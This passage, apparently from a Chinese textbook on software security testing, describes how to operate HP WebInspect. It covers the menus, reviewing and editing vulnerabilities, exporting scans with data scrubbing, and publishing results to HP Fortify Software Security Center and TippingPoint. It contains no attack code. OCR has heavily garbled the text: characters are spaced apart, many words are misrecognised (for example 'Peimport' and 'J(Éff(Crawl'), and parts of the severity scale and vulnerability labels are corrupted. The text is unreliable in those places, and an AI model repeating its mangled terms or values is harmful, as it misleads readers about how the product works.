动 上 传 扫描 ”未 设置 时 ， 这 是 使 用 频率 最 高 的 操作 。 

下 载 扫 描 (Download Scan): 允许 用 户 选择 从 AMP 服务 器 复制 到 硬盘 驱动 器 的 扫描 。 

发 布 扫描 (Publish Scan): 显示 一 个 对 话 框 ， 人 允许 用 户 查 看 漏洞 ， 并 将 它们 传送 到 企业 服 
务 器 ， 再 将 它们 依次 传送 到 HP Fortify Software 的 安全 中 心服 务 器 。 

传送 设置 (Transfer Settings): 允许 选择 一 个 WebInspect 设置 文件 ， 并 将 其 转移 到 企业 服 
务 器 ， 这 将 创建 一 个 基于 这 些 设置 的 扫描 模板 。 还 可 选择 一 个 企业 级 服务 器 扫描 模板 ， 并 将 
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其 转移 到 WebInspect， 这 将 创建 一 个 基于 模板 的 设置 文件 。 

Web 控制 台 (WebConsole): 启动 AMP 或 WebInspect Enterprise Web 控制 台 应 用 程序 。 只 
有 当 连 接 到 企业 服务 器 ， 该 按钮 才 会 出 现 。 

关于 企业 服务 器 (About Enterprise Server): 显示 相关 评估 管理 平台 和 WebInspect 
Enterprise 信息 。 

注意 ，WebInspect 在 任何 时 候 都 可 以 安装 一 个 独立 的 许可 证 连接 到 企业 服务 器 ， 只 要 上 
户 是 AMP 或 WebInspect Enterprise 的 角色 成 员 。 


7) 报告 菜单 
报告 菜单 包含 以 下 命令 。 
生成 报告 (Generate Reports): 启动 报告 生成 。 
管理 报告 (Manage Reports): 显示 标准 和 自 定义 报告 类 型 的 列表 。 用 户 可 以 重 命名 、 删 除 
或 导出 自 定义 设计 报告 ， 也 可 以 导入 报告 定义 文件 。 
告 设计 器 (Report Designer): 启动 报告 设计 器 ， 人 允许 用 户 定义 一 个 自 定义 报告 。 


8) 帮助 菜单 

下 面 的 命令 在 帮助 菜单 中 可 用 。 

WeblInspect 帮助 (WebInspect Help): 打开 帮助 文件 。 

首页 (Index): 打开 帮助 文件 ， 在 左 窗 格 中 显示 索引 。 

搜索 (Search): 打开 帮助 文件 ， 在 左 窗 格 中 显示 搜索 选项 。 

支持 (Support): 如 果 支 持 渠道 被 启用 ， 显 示 一 个 视窗 ， 允 许 用 户 将 增强 请 求 提交 给 HP. 

教程 (Tutorials): 允许 下 载 教程 和 其 他 WebInspect 文档 。 

关于 WebInspect(About WebInspect): 有 关 WebInspect 应 用 程序 显示 的 信息 , 包括 许可 证 
信息 、 人 允许 主机 和 属性 。 
10.247 HP 应 用 安全 中 心 


HP 应 用 安全 中 心 的 应 用 程序 ， 在 任务 栏 通知 区 域 用 图 
标 表 示 ， 如 图 10-24 所 示 , 提供 一 个 上 下 文 菜单 ， 允 许 用 户 : 

。 开始 /停止 检测 部 件 服务 。 

。 开始 /停止 调度 服务 。 

。 配置 WebInspect 作为 评估 管理 平台 (AMP) 检 测 部 件 。 

当 某 些 事件 发 生 时 ， 弹 出 消息 也 会 随 之 出 现 。 

使 用 这 项 功能 , 用 户 可 将 WebInspect 作为 一 个 独立 的 扫 
描 仪 进行 安装 ， 然 后 连接 到 AMP 或 WebInspectEnterprise。 


10.28 检查 结果 : 向 导 扫 描 或 基础 扫描 
只 要 运行 一 个 向 导 扫 描 或 基础 扫描 , WebInspect 就 会 开始 评估 Web 应 用 程序 并 在 导航 窗 


格 中 显示 每 个 会 话 (使 用 本 网 站 或 序列 视图 ) 的 图 标 。 它 还 报告 摘要 窗 格 中 漏洞 选项 卡 和 信息 
选项 卡 上 可 能 存在 的 漏洞 。 


4X Q, 7:08AM 


图 10-24 HP 安全 中 心 的 应 用 程序 
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如 果 单 击 摘要 窗 格 中 列 出 的 URL, 在 导航 窗 格 中 该 程序 突出 显示 相关 会 话 ,并 在 信息 窗 
格 中 显示 相关 信息 。 

有 了 时， 所 检测 到 的 含有 漏洞 的 会 话 攻击 不 会 在 攻击 信息 中 列 出 。 也 就 是 说 ， 如 果 用 户 在 
导航 窗 格 中 选择 一 个 有 漏洞 的 会 话 ， 然 后 在 Session Info( 会 话 信息 ) 面 板 单 击 Attack Info( 攻 击 
信息 )， 攻 击 信息 不 会 显示 在 信息 窗 格 中 。 这 是 因为 攻击 信息 通常 与 创造 攻击 的 会 话 相关 联 ， 
而 不 是 与 其 被 检测 到 的 会 话 相关 联 。 发 生 这 种 情况 时 ， 选 择 上 一 级 会 话 ， 然 后 单 击 Attack 
Info( 攻 击 信息 )。 

如 果 在 漏洞 选项 卡 的 漏洞 描述 上 单 击 鼠 标 右键 ， 用 户 可 以 通过 快捷 菜单 : 

。 复制 网 址 (Copy URL): 复制 网 址 到 Windows 剪贴 板 。 

。 复制 选择 条 目 (Copy Selected Item(s)): 复制 选 定 的 条 目 到 Windows 剪贴 板 中 的 文本 。 

。 复制 所 有 条 目 (Copy AN Items): 复制 所 有 的 条 目 到 Windows 剪贴 板 中 的 文本 。 

。 导出 (Export): 创建 一 个 逗号 分 隔 值 (CSV) 文 件 。 

。 在 浏览 器 中 查看 (View in Browser): 在 浏览 器 中 查看 HTTP 响应 。 

。 当前 值 的 过 滤器 (Filter by Current Value): 限定 满足 选择 标准 的 漏洞 显示 。 例如， 如 
RTE POST 的 方法 列 单 击 鼠标 右键 ， 然 后 选择 Filter by Current Value， 列 表 中 只 显示 
那些 被 发 现 通 过 使 用 POST 方法 发 送 的 HITP 请 求 的 漏洞 。 

。 更改 严重 性 (Change Severity): 允许 更 改 的 严重 性 级 别 。 

。 编辑 漏洞 Edit Vulnerability): 显示 编辑 对 话 框 中 的 漏洞 ， 修 改 各 种 漏洞 特征 。 

。 审阅 漏洞 Review Vulnerability): 重新 测试 漏洞 会 话 ， 将 其 标记 为 误 报 ， 或 将 其 发 送 
到 HP 质量 中 心 或 IBM Rational ClearQuest。 

。 标记 为 (Mark as): 允许 标记 漏洞 作为 误 报 或 忽略 。 要 查看 误 报 ， 在 扫描 信息 面板 中 
选择 误 报 。 这 两 种 情况 下， 该 漏洞 可 从 列表 中 删除 。 用 户 可 在 扫描 信息 面板 选择 误 
报 来 查看 所 有 误 报 的 列表 。 用 户 也 可 以 通过 在 扫描 信息 面板 中 选择 仪表 板 查 看 误 报 
和 忽略 的 漏洞 列表 ， 然 后 在 统计 列 单 击 已 删除 条 目的 超 链接 数量 。 注意: 可 恢复 “ 误 
报 ” 和 “忽略 ”的 漏洞 。 

。 发 送 到 (Send to): 转换 该 漏洞 的 缺陷 ， 并 将 其 添加 到 HP 质量 中 心 或 IBM Rational 


ClearQuest 数据 库 。 
。 删除 位 置 (Remove Location): 从 导航 窗 格 (包括 网 站 和 序列 视图 ) 删 除 选 定 会 话 ， 并 删 
除 任何 相关 的 漏洞 。 


注意 : 可 恢复 删除 位 置 (会 话 ) 及 其 相关 的 漏洞 。 

。 J(Éff(Crawl: 疏 行 选 定 的 URL. 

* 工具 (Tools): 介绍 可 用 工具 的 子 菜单 。 

。 附件 (Attachments): 允许 创建 与 选 定 会 话 相关 的 说 明 ， 标 志 会 话 的 跟 进 ， 添 加 一 个 
漏洞 说 明 ， 或 添加 一 个 漏洞 快照 。 

如 果 右 键 单 击 组 标题 ， 通 过 一 个 快捷 菜单 可 以 : 

e 折 释 /展开 所 有 组 (Collapse/Expand All Groups) 

。 折 秋 /展开 组 (Collapse/Expand Group) 
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。 复制 选 定 的 条 目 (Copy Selected Item(s) 
。 复制 所 有 条 目 (Copy All Items) 

。 导出 (Export) 

。 更 改 严重 性 (Change Severity) 

。 标记 为 (Mark as) 

© 发 送 至 (Send to) 

。 删除 位 置 (Remove Location) 


1. 会 话 


会 话 是 一 个 匹配 的 集合 ,包括 通过 WebInspect 发 送 HTTP 请 求 来 测试 漏洞 ， 以 及 从 服务 
器 接收 的 HTTP 响应 。 息 行 或 扫描 过 程 中 采用 的 每 个 会 话 被 列 在 导航 窗 格 中 。 

在 信息 窗 格 中 单 击 导航 窗 格 中 的 会 话 来 查看 相关 会 话 信息 。 

在 信息 窗 格 中 ， 顶 部 区 域 包含 一 些 控件 的 视图 ， 在 这 里 可 以 搜索 显示 的 文本 。 如 果 要 使 
用 正则 表达 式 进行 搜索 ， 选 择 Regex 复 选 框 。 状 态 栏 将 显示 行 数 和 当前 行 ， 并 找到 一 个 条 目 
的 当前 列 以 及 相 匹 配 的 条 目 总 数 。 

2. 会 话 快捷 菜单 


右键 单 击 会 话 显示 一 个 快捷 菜单 ， 允 许 用 户 调查 选 定 会 话 。 命 令 的 可 用 性 取决 于 所 选 的 
会 话 。 

用 户 可 以 很 容易 地 导出 一 个 文本 或 XML 文件 中 的 每 个 会 话 的 URL、 评 论 、 隐 藏 字段 和 
各 种 其 他 信息 的 列表 。 

3. 编辑 漏洞 


WebInspect 评估 应 用 程序 的 漏洞 后 ， 用 户 可 能 需要 为 各 种 各 样 的 原因 编辑 并 保存 结果 ， 

包括 : 

。 安全 性 (Security): 如 果 一 个 HTTP 请 求 或 响应 中 包含 密码 、 账 号 或 其 他 敏感 数据 ， 
用 户 可 能 想 删 除 或 修改 此 信息 ， 使 扫描 结果 在 组 织 中 对 其 他 人 可 用 。 

。 校正 (Correctiom): WebInspect 偶尔 会 报告 “ 误 报 ”， 这 种 情况 发 生 在 WebInspect 检 
测 有 可 能 是 漏洞 迹象 时 ， 但 进一步 的 调查 由 开发 人 员 确定 实际 上 是 否 为 误 报 。 用 户 
可 从 会 话 中 删除 该 漏洞 或 删除 整个 会 话 。 或 者 ， 可 将 它 指定 为 误 报 (右键 单 击 任 一 网 
站 或 序列 视图 中 的 会 话 ， 然 后 选择 标记 为 误 报 )。 

。 严重 性 修改 (Severity Modification): 如 果 不 同 意 漏洞 的 等 级 ， 可 指定 一 个 不 同等 级 ， 
使 用 以 下 规模 : 

本 二 人 Normal 

10 Information 
11 - 25 Low 

26 - 50 Medium 

51 - 75 High 

76 - 100 Critical 
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。 记录 保存 (Record Keeping): 用 户 可 修改 任何 与 个 人 有 关 的 报告 字段 的 漏洞 (摘要 、 
执行 、 建 议 、 实 施 、 修 正和 参考 资料 )。 例 如 ， 用 户 可 添加 一 个 段落 来 描述 如 何 真正 
解决 问题 的 修正 部 分 。 

。 增强 (Enhancemenb: 如 果 发 现 一 个 新 漏洞 ， 可 以 定义 它 ， 并 把 它 添加 到 一 个 会 话 作 
为 一 个 自 定义 的 漏洞 。 

按照 下 面 的 步骤 编辑 会 话 : 

1) 在 导航 窗 格 中 ， 右 键 单 击 包 含 一 个 漏洞 的 会 话 或 在 摘要 窗 格 中 右键 单 击 一 个 URL。 

2) 从 快捷 菜单 中 选择 Edit Vulnerability( 编 辑 漏洞 )。 编 辑 漏洞 窗口 如 图 10-25 所 示 。 

3) 选择 一 个 漏洞 (如 果 会 话 包含 多 个 安全 漏洞 )。 

4) 要 添加 一 个 现 有 的 漏洞 会 话 (也 就 是 ， 一 个 存在 于 数据 库 中 的 漏洞 )， 单 击 Add 

Existing( 添 加 现 有 )。 
a) 在 添加 现 有 的 漏洞 窗口 中 ， 输 入 一 个 漏洞 名 称 的 一 部 分 ， 或 一 个 完整 的 漏洞 ID 
号 或 类 型 。 
b) 单 击 Search( 搜 索 )。 
c) 选择 一 个 或 更 多 的 搜索 的 漏洞 。 
d) 单 击 OK( 确 定 )。 


过 


Edit Vulnerabilities 


Vulnerabilities 
Check Name CheckType Severity Probability 
Backup File (Appended bak) Vulnerability High 
Possible Server Path Disclosure (unix) Vulnerability Low 


Unencrypted Login Form Vulnerability High 


Logins Sent Over Unencrypted Connection Vulnerabilty High 


Vulnerability Detail 


: [Backup File (Appended .bak) 
i | Vulnerability 


implementing a security policy within your organization that prohibits backing up web application source code in the webroot, 


EEC 
图 10-25 编辑 漏洞 窗口 


5) 要 添加 一 个 自 定义 漏洞 ， 单 击 Add Custom( 添 加 自 定义 )。 然 后 ， 可 以 编辑 该 漏洞 ， 正 
如 在 步骤 7 中 所 描述 的 那样 。 
6) 要 删除 选 定 会 话 的 漏洞 ， 单 击 Delete( 删 除 )。 
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7) 要 修改 漏洞 ， 从 漏洞 详细 部 分 选择 不 同 的 选项 。 用 户 也 可 以 修改 出 现在 摘要 的 描述 、 
含义 、 执 行 、 修 复 、 参 考 信息 选项 卡 的 漏洞 。 
8) 单 击 OK( 确 定 ) 保 存 更 改 。 


10.29 检查 结果 : Web 服务 扫描 


大 多 数 Web 服务 使 用 简单 对 象 访问 协议 (SOAP), 在 Web 服务 器 和 客户 端 Web 应 用 程序 
之 间 发 起 信息 请 求 来 发 送 XML 数据 。XML 提供 了 一 个 框架 描述 ， 并 包含 结构 化 数据 。 客 户 
端的 Web 应 用 程序 可 以 容易 地 理解 所 返回 的 数据 ， 并 将 该 信息 提供 给 最 终 用 户 。 

访问 Web 服务 客户 端的 Web 应 用 程序 接收 到 一 个 Web 服务 定义 语言 (WSDL) 文 件 ， 以 
便 它 知道 如 何 与 该 服务 进行 通信 。WSDL 文档 描述 的 程序 包含 在 Web 服务 器 中 ， 如 图 10-26 
所 示 。 
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图 10-26 Web 服务 扫描 检查 结果 


在 导航 窗 格 中 或 摘要 窗 格 中 的 漏洞 选项 卡 上 选择 一 个 会 话 对 象 后 ， 用 户 可 从 会 话 信息 
板 选择 该 选项 。 


10.2.10 ”导出 扫描 


WebInspect 自动 在 应 用 程序 设置 的 指定 目录 中 保存 扫描 结果 。 

使 用 导出 功能 将 扫描 信息 传送 到 另 一 个 WebInspect 应 用 程序 或 评估 管理 平台 (AMP)。 

按照 下 面 的 步骤 来 导出 扫描 : 

1) 打开 要 导出 的 扫描 或 单 击 包 含 一 个 打开 的 扫描 的 选项 卡 。 单 击 File Export- 
Scan(“ 文 件 ” 一 “导出 ”一 “扫描 ”) 或 File 一 Export Scan to Software Security Center(“ 文 
件 ” 一 “导出 ”一 “扫描 到 软件 安全 中 心 ”), 或 在 开始 页 面 的 管理 扫描 窗 格 中 选择 一 个 扫描 ， 
单 击 Export( 导 出 ) 按 钮 的 下 拉 箭 头 , 然后 选择 Export Scan( 导 出 扫描 ) 或 Export Scan to Software 
Security Center( 导 出 扫描 到 软件 安全 中 心 )。 导 出 扫描 窗口 (或 导出 扫描 到 软件 安全 中 心 窗口 ) 


E 
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会 出 现 ， 如 图 10-27 所 示 。 


[E] IP Address W000.0 ON 


Attachments. 


[v] Export Logs Export 
Ready 


图 10-27 Export a Scan( 导 出 扫描 ) 窗 口 


2) 探 洗 数 据 (The Scrub Data) 组 在 默认 情况 下 包含 三 个 不 可 编辑 的 正则 表达 式 函数 替代 
和 中 每 个 数字 的 格式 化 字符 串 ， 如 一 个 社会 安全 号 码 、 信 用 卡号 码 或 瑟 地 址 。 如 果 要 包含 一 
个 搜索 和 替换 功能 ， 需 要 选择 与 其 相关 的 复 选 框 。 
3) 要 创建 擦洗 功能 : 
a) 单 击 Add( 添 加 )。 
b) 在 添加 擦洗 输入 窗口 中 ， 选 择 Regex( 正 则 表达 式 ) 或 从 Type( 类 型 ) 列 表 中 选择 
Literal( 文 字 )。 
c) 在 Match( 匹 配 ) 框 中 ， 输 入 要 查找 的 字符 串 ( 或 一 个 字符 串 表示 的 正则 表达 式 )。 如 
果 使 用 正则 表达 式 ， 用 户 可 单 击 浏览 按钮 w， 打 开 正 则 表达 式 编辑 器 ， 使 用 它 
可 以 创建 和 测试 正则 表达 式 。 
d) 在 Replace( 替 换 ) 杠 中， 输入 将 由 匹配 字符 串 替换 的 目标 指定 字符 串 。 
e) 单 击 OK( 确 定 )。 
Publish Scan to Software Security Center 窗口 不 包含 附件 或 日 志 的 选项 。 如 果 要 导出 到 软 
件 安全 中 心 ， 请 转 到 步骤 6。 
4) 如 果 要 导出 到 软件 安全 中 心 ， 请 转 到 步骤 7。 
5) 如 果 想 要 包含 一 个 附件 : 
a) 在 Attachments( 附 件 ) 组 中 ， 单 击 Add( 添 加 )。 
b) 使 用 标准 文件 选择 窗口 ， 导 航 到 包含 要 附加 文件 的 目录 。 
c) 选择 一 个 文件 ， 然 后 单 击 Open( 打 开 )。 
6) 如 果 要 包括 扫描 的 日 志文 件 ， 选 择 Export Logs( 导 出 日 志 )。 
7) 单 击 Export( 导 出 )。 
8) 使 用 标准 的 文件 选择 窗口 ， 选 择 一 个 位 置 ， 然 后 单 击 Save( 保 存 )。 


10.2.11 导出 扫描 详细 信息 
使 用 导出 功能 保存 Weblnspect 息 行 或 审计 时 收集 到 的 信息 。 
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1) 打开 扫描 ， 或 单 击 包 含 扫描 的 选项 卡 。 
2) 单 击 File 一 Export Scan Details(“ 文 件 ” 一 “导出 ”一 “扫描 详细 信息 ”)。 出 现 Export 
Scan Details( 导 出 扫描 详细 信息 ) 窗 口 ， 如 图 10-28 表示 。 


3) 从 Details( 详 细 信 息 ) 信 息 列表 中 ， 选 择 要 导出 信息 的 类 型 。 可 用 条 目 取 决 于 扫描 进行 
的 类 型 。 


4) J Export Fonmat( 输 出 格式 ) 列 表 中 选择 一 种 格式 (文本 或 XML)。 
10.2.12 ”发 布 到 软件 安全 中 心 


1. 通过 WebInspect Enterprise 发 布 


通过 WebInspect Enterprise， 请 使 用 以 下 过 程 将 扫描 数据 传输 到 HP Fortify Software 安全 
中 心服 务 器 。 

1) 配置 WebInspect Enterprise 和 软件 安全 中 心 。 

2) 运行 扫描 中 的 WebInspect( 或 使 用 导入 或 下 载 扫描 )。 

3) 单 击 Enterprise Server 菜单 ， 并 选择 Connect to WebInspect Enterprise( 连 接 WebInspect 
Enterprise)。 系 统 将 提示 提交 的 凭证 。 


ESI Export Scan Details 


Settings 


pere [Comments 有 
Export Format: [XML ~ | to use. 


Details Description 


Exports all comments located within responses. Comments include: 
Comments: <!-- my comment --> 

C style comments: '// My comment or '/" My comment "7" 

Note: Comments are base64 encoded when exported in XML 


Scrub Data 


Top 
[SSN— [— E 
Credit Car 
IP Address 2994209042004 500« 


a) 单 击 & Synchronize 。 
b) 选择 一 个 项 目 和 版 本 ， 然 后 单 击 OK( 确 定 )。 
c) 检查 结果 。 在 摘要 窗 格 中 列 将 出 现 指定 “发 布 状态 ”(Published Status) 和 “待定 状 
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Æ?” (Pending Status)。 发 布 状态 是 这 个 漏洞 扫描 发 布 到 WebInspect Enterprise 上 一 
次 的 状态 。 待定 状态 是 扫描 公布 之 后 , 漏洞 将 是 什么 状态 。 根据 不 同 的 待定 状态 ， 
可 以 修改 它 来 指定 该 漏洞 是 否 已 经 解决 或 依然 存在 ( 见 第 7 步骤 )。 此 外 ， 命 名 为 
“未 找到 ”的 一 个 新 选项 卡 出 现 ， 此 选项 卡 包含 以 前 扫描 中 检测 到 的 漏洞 ， 但 并 

不 是 当前 扫描 中 的 漏洞 。 用户 可 以 添加 屏幕 截图 和 评论 漏洞 或 标记 漏洞 为 误 报 或 
忽略 。 还 可 以 查看 并 重新 测试 漏洞 ， 修 改 扫描 结果 ， 直 到 准备 好 发 布 。 

d) 单 击 国 Pubish |。 转 到 步骤 7。 

5) 要 从 扫描 列表 中 进行 选择 ， 可 执行 以 下 步 又 : 

a) 单 击 Enterprise Server 菜单 ， 然 后 选择 Publish Scan( 发 布 扫描 )。 

b) 在 Publish Scan to Software Security Center 对 话 杠 中， 选择 一 个 或 多 个 扫描 。 

c) 选择 一 个 项 目 和 项 目 版 本 。 

d) 单 击 Next( 下 一 步 )。WebInspect 可 以 使 用 SSC 自动 同步 。 

6) WebInspect 列 出 要 公布 的 漏洞 数量 ， 按 状态 和 严重 程度 进行 分 类 。 为 确定 身份 ， 
WebInspect 可 在 当前 扫描 中 比较 以 前 提交 的 漏洞 (通过 SSC 同步 获得 )。 如 果 这 是 第 一 次 扫描 
提交 的 项 目 版 本 ， 所 有 漏洞 将 是 “新 漏洞 ”。 

如 果 一 个 漏洞 被 先前 报告 过 ， 但 不 在 当前 扫描 中 ， 它 会 标记 为 “未 找到 ” 用 户 必须 确 
定 它 是 否 因为 已 被 固定 或 扫描 配置 不 同 而 未 被 发 现 (例如 ， 可 能 使 用 不 同 的 扫描 策略 ,或 者 扫 
描 网 站 的 不 同 部 分 ， 或 者 提前 终止 扫描 )。 

7) 如 果 扫 描 是 为 了 回应 HP Fortify Software 安全 中 心 , 则 选择 Associate scan with an “In 
Progress" scan request for the current project version( 在 当前 项 目的 版 本 关联 “进行 中 ”的 扫描 
请 求 )。 

8) 单 击 Publish( 完 成)。 

单 击 Publish 后 ， 扫 描 排队 等 待 上 传 到 WebInspect Enterprise。 它 被 上 传 后 ，WebInspect 
可 将 企业 排队 扫描 发 布 到 共享 服务 中 心 。 出 于 这 个 原因 ， 发 布 在 待定 状态 和 发 布 状态 列 中 的 
结果 不 会 立即 显示 出 来 。 如 果 要 监视 上 传 和 发 布 操作 ， 可 使 用 WebInspect Enterprise 
WebConsole(WebInspect EnterpriseWeb 控制 台 ) 按 钮 连接 到 WebInspect Enterprise。 


2. Weblnspect Enterprise 集成 化 


HP Fortify Software 安全 中 心 (SSC) 是 一 套 紧 密集 成 的 解决 方案 ， 用 于 识别 优先 级 分 配 和 
修复 安全 漏洞 软件 。 它 使 用 HP Fortify 静态 代码 分 析 器 进行 静态 分 析 ， 使 用 HP Weblnspect 
进行 动态 应 用 安全 测试 。WebInspect Enterprise 提供 了 一 个 中 央 位 置 管理 多 个 WebInspect 扫描 
和 关联 扫描 结果 ， 在 SSC 内 可 以 直接 发 布 到 个 人 项 目 版 本 。 

经 过 WebInspect 扫描 ， 与 WebInspect Enterprise 进行 同步 来 获取 历史 信息 ， 比 较 那些 历 
史上 扫描 的 漏洞 ， 然 后 分 配 一 个 状态 给 每 个 漏洞 ， 如 表 10-9 所 示 。 


*346* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


表 10-9 SSC 说 明 


SSC 状态 描述 

新 建 以 前 未 报告 的 问题 

现 有 在 扫描 历史 上 已 经 存在 的 漏洞 
在 扫描 历史 上 未 发 现 的 漏洞 。 这 可 能 是 因为 (a) 该 漏洞 已 经 被 修复 并 不 再 存在 ， 或 (@b) 

未 发 现 因为 最 新 的 扫描 中 使 用 不 同 的 设置 ， 或 扫描 该 网 站 的 不 同 部 分 ， 或 者 由 于 其 他 原因 
未 发 现 漏洞 

已 解决 已 修复 漏洞 

重新 引入 出 现在 当前 扫描 的 漏洞 ， 但 以 前 报道 Solved( 已 解决 ) 

仍然 是 一 个 问题 这 是 在 当前 扫描 “未 找到 ”的 一 个 漏洞 ， 事 实 上 存在 


要 更 改 单个 漏洞 的 SSC 状态 ， 请 右键 单 击 Vulnerability( 漏 洞 ) 选 项 卡 上 的 漏洞 ， 然 后 选 
Tf Modify Publish Status( 修 改 发 布 状态 )。 连 接 到 WebInspect Enterprise 和 已 同步 WebInspect 
软件 安全 中 心 后 ， 此 选项 才 会 出 现 。 

下 面 的 例子 演示 了 将 安全 漏洞 集成 到 HP Fortify Software 安全 中 心 假想 的 一 系列 扫描 。 

。 第 1 次 扫描 

1) 扫描 目标 网 站 的 WebInspect。 在 这 个 例子 中 ， 假 设 只 有 一 个 漏洞 (漏洞 号 A) 被 发 现 。 

2) 检查 结果 。 可 添加 屏幕 截图 和 评论 漏洞 或 标记 漏洞 为 误 报 或 忽略 。 还 可 以 检查 , 重新 
测试 ， 并 删除 漏洞 。 

3) 扫描 与 项 目 版 本 SSC 同步 ， 然 后 发 布 扫描 。 

。 第 2 次 扫描 

1) 第 2 次 扫描 再 次 显露 漏洞 号 A， 但 也 发 现 了 4 个 漏洞 (漏洞 号 B、C、D 和 E)。 

2) 扫描 项 目 版 本 在 SSC 中 同步 。 

3) 检查 结果 。 如 果 发 布 第 一 次 扫描 时 ， 对 漏洞 号 A 加 入 审计 数据 (如 评论 和 截图 )， 数 据 
将 被 导入 到 新 的 扫描 。 

4) 发 布 扫描 到 SSC。 漏洞 号 A 将 被 标记 为 “ 现 有 ” 漏洞 号 B、C、D、E 将 被 标记 为 “新 
AE", S 个 项 目 将 存在 于 SSC 系统 。 

。 第 3 次 扫描 

1) 第 3 次 扫描 发 现 漏洞 号 B、C 和 D， 而 不 是 漏洞 号 A 或 漏洞 号 E。 

2) 扫描 的 项 目 版 本 在 SSC 中 同步 。 

3) 重新 测试 漏洞 号 A 后 ， 确 定 它 事 实 上 存在 。 更 改 其 待定 状态 为 Stll a Problem( 仍 然 是 
一 个 问题 )。 

4) 重新 测试 漏洞 号 EE 后， 确定 不 存在 。 更 改 其 待定 状态 为 Solved (已 解决 )。 

5) 发 布 扫描 到 SSC。 漏 洞 号 B、C 和 DD 将 被 标记 为 Existed( 现 有 )。5 个 项 目 将 存在 于 SSC 

e 第 4 次 扫描 

1) 第 4 次 扫描 没有 发 现 漏洞 号 A 或 B。 扫 描 发 现 漏洞 号 C、D、E 和 下。 
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2) 扫描 的 项 目 版 本 在 SSC 中 同步 。 

3) 漏洞 号 王 先前 宣布 要 解决 ， 所 以 它 的 状态 设置 为 Peimport( 重 新 引入 )。 

4) 检查 未 发 现 这 个 漏洞 (A 和 B)。 如 果 确定 该 漏洞 依然 存在 ， 更 新 待定 状态 为 Still a 
Problem( 仍 然 是 一 个 问题 )。 如 果 重 新 测试 验证 该 漏洞 不 存在 , 更 新 的 待定 状态 为 Solved( 已 解 


决 )。 


5) 发 布 扫描 到 SSC。 漏 洞 号 C 和 DD 仍然 标 有 Existed( 现 有 )。 
3. 通过 AMP 发 布 


连接 到 AMP， 使 用 下 列 步骤 将 扫描 数据 发 布 到 HP Fortify Software 安全 中 心 : 
1) 单 击 WebInspect Enterprise Server 菜单 ， 然 后 选择 Publish Scan( 发 布 扫描 )。 
2) 在 Publish Scan to Software Security Center 窗口 中 ， 从 扫描 名 称 列 选择 WebInspect 


扫描 。 


要 在 不 同 的 数据 库 访 问 扫描 ， 单 击 Connections( 连 接 )， 然 后 在 数据 库 应 用 程序 设置 
Connection Settings for Scan Viewing( 扫 描 视 图 的 连接 设置 ) 下 更 改选 项 。 
3) 从 AMP 组 的 下 拉 列表 中 选择 一 个 网 站 。 可 以 通过 选择 Show Organizations( 显 示 组 织 ) 


查看 组 织 和 项 目 。 
每 次 扫描 都 必须 分 配 到 一 个 网 站 。 该 计划 试图 选择 匹配 扫描 文件 中 的 “扫描 网 址 ”的 网 
站 ， 但 可 以 选择 一 个 蔡 代 。 
如 果 相 应 网 站 不 存在 ， 可 在 AMP 网 站 使 用 下 列 程序 创建 。 必 须 具有 AMP 权限 才能 创 
建 一 个 网 站 。 
a) 单 击 Create Site( 创 建 网 站 )( 在 对 话 框 的 右上 角 )。 


b) 为 对 AMP 服务 器 窗口 建立 网 站 ， 提 供 以 下 信息 。 


MHE Project): 选择 项 目 名 称 。 

网 站 名 称 (Site Name): 输入 该 网 站 的 名 称 。 

网 址 (URL): 输入 一 个 完全 限定 的 域名 或 他 地址 。 

阶段 (Phase): 输入 阶段 的 名 称 ， 或 从 阶段 列表 中 选择 一 个 现 有 的 名 称 (可 选 )。 对 
于 分 配 了 阶段 的 网 站 ， 可 只 显示 这 些 网 站 是 一 个 特定 阶段 的 成 员 。 

组 (Group): 输入 组 的 名 称 , 或 从 组 列表 中 选择 一 个 现 有 的 名 称 (可 选 )。 如 果 创建 
网 站 群 ， 可 以 只 显示 这 些 网 站 是 一 个 特定 组 的 成 员 。 

身份 验证 (Authentication): 如 果 需 要 身份 验证 ， 从 列表 中 选择 一 个 类 型 。 

权重 (Weighb: 权重 用 来 计算 风险 评分 。 该 网 站 的 风险 评分 等 于 最 近 完 成 扫描 的 
该 网 站 乘 以 用 户 在 此 处 选择 的 值 。 它 允许 用 户 表 明 一 些 网 站 更 重要 或 比 其 他 网 站 
具有 更 高 的 风险 。 


c) 单 击 OK( 确 定 )。 
4) 在 Software Security Center( 软 件 安全 中 心 ) 组 中 ， 单 击 登 录 。 
5) 输入 凭据 ， 然 后 单 击 OK( 确 定 )。 
6) 选择 一 个 项 目 版 本 。 
7) 单 击 Publish( 发 布 )。 
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10.2.13 HPTippingPoint 导出 保护 规则 


使 用 导出 功能 来 创建 一 个 xml 文件 , 在 Web 应 用 程序 的 扫描 过 程 中 , 基于 HP WebInspect 
检测 到 的 漏洞 ， 该 文件 可 以 导入 到 TippingPoint 数字 疫苗 工具 包 。 然 后 ， 通 过 入 侵 防御 系统 
(PS) 设 备 的 一 个 网 络 分 布 ， 数 字 疫 苗 工 具 包 可 以 创建 过 滤器 并 将 其 导入 到 HP TippingPoint 
的 安全 管理 系统 。 

要 创建 可 以 导入 到 TippingPoint 的 数字 疫苗 工具 包 文 件 ， 可 执行 以 下 操作 。 

1) 打开 感 兴趣 的 扫描 (或 单 击 包 含 一 个 要 打开 的 扫描 的 选项 卡 )， 然 后 单 击 File( 文 件 )， 
再 依次 单 击 Export( 导 出 ) 和 Protection Rules to HP TippingPoint(HP TippingPoint 保护 规则 )， 如 
图 10-29 所 示 。 


Export to HP TippingPoint 


Usethis dialog to performfull XML exportto import into HP TippingPoint DV Toolkit. 


Export Path: Browse... 


Destination Address: 


* Destination Address field populates IPtab in DV ToolKit. 


eoor ][ cm J 


图 10-29. HP TippingPoint 保护 规则 


2) 指定 Export Path( 导 出 路 径 )， 即 该 目录 中 要 保存 新 文件 。 

3) Destination Address( 目 的 地 址 ) 是 可 选 的 。 

4) 单 击 Export( 导 出 )。 

映射 的 漏洞 转换 并 导出 到 部 分 或 全 部 指定 路 径 下 的 文件 : 

* TpXssRules.xml 

* TpSglinjRules.xml 

* TpFileIncludeRules.xml 

5) 在 TippingPoint 的 数字 疫苗 工具 包 , 单 击 File( 文 件 ), 再 单 击 Import XML XML), 
在 同一 时 间 导 入 每 个 xml 文件 。 忽 略 所 有 过 滤器 验证 信息 ( 单 击 Yes 继续 )。 导 入 文件 的 内 容 
累积 在 过 滤器 之 一 的 .csw 文件 。 

6) 单 击 File( 文 件 ), 再 单 击 Save As( 另 存 为 ), 累积 文件 (accumulated file) 保 存 为 .csw 文件 。 

